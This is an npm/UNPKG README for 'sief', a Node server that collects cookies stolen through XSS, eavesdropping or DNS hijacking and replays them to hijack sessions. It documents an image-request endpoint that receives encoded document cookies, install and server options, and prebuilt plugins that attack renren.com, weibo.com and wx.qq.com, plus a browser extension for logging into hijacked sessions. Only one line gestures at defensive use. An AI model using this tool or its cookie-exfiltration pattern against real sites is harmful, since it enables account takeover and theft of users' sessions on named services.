UNPKG

sief

Version:

Session hijacking tool in Node.

github.com/shaoshuai0102/thief

shaoshuai0102/thief

55 lines (34 loc) 2.15 kB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
sief ============= A server listening to cookie submission to hijack session, supporting writing plugins for site specific attacks. sief = thief + safe This is a project to hijack sessions, and also a project to make your site safer, depending on the way you use it. ## Philosophy * Do **NOT** steal cookies, only accept cookies from everywhere(xss, network eavsdropping, dns hijacking…) * Focus on the exploitation of session hijacking. ## Features * Request to an image to upload cookies stolen by xss/network eavsdropping/dns hijack/other. * Log persistence. * Prebuilt plugins to attack renren.com, weibo.com, wx.qq.com. * Write your own plugins to do other attacks you desired. Plugins are loaded/reloaded/unloaded when added/changed/removed automatically, no need to restart. * View real-time cookie submissions and login to those hijacked sessions directly in browser with [Sief Chrome Extension](https://github.com/shaoshuai0102/sief-chrome-extension). * Ignore cookie submissions if the same one is received before, during a specified period of time, to protect your server. ## Install 1. Install PhantomJS 2. Install sief `npm install sief -g` ## Usage ### Server Usage: sief [options] <plugin|dir ...> Options: -h, --help output usage information -V, --version output the version number -i, --ignore-time [seconds] specify seconds during which same requests will be ignored [300] -p, --port [port] specify the port sief server listening to [3000] -l, --log-level [level] set log level [INFO] ### Submit cookies GET /xxx.png?cookie=#cookies#&referer=#referer#&domain=#domani# Parameters: * `cookies` - Required. Encode cookies first, for example, `encodeURIComponent(document.cookies)` * `referer` - If the attack is an xss exploit, referer will be retrieved from `headers.referer` directly, otherwise, specifiy it in query string. * `domain` - Domain is calculated from referer, defaults to main domain, for example `qq.com`. IF you want to fire a attack to its subdomain(`wx.qq.com`), specify it in query string.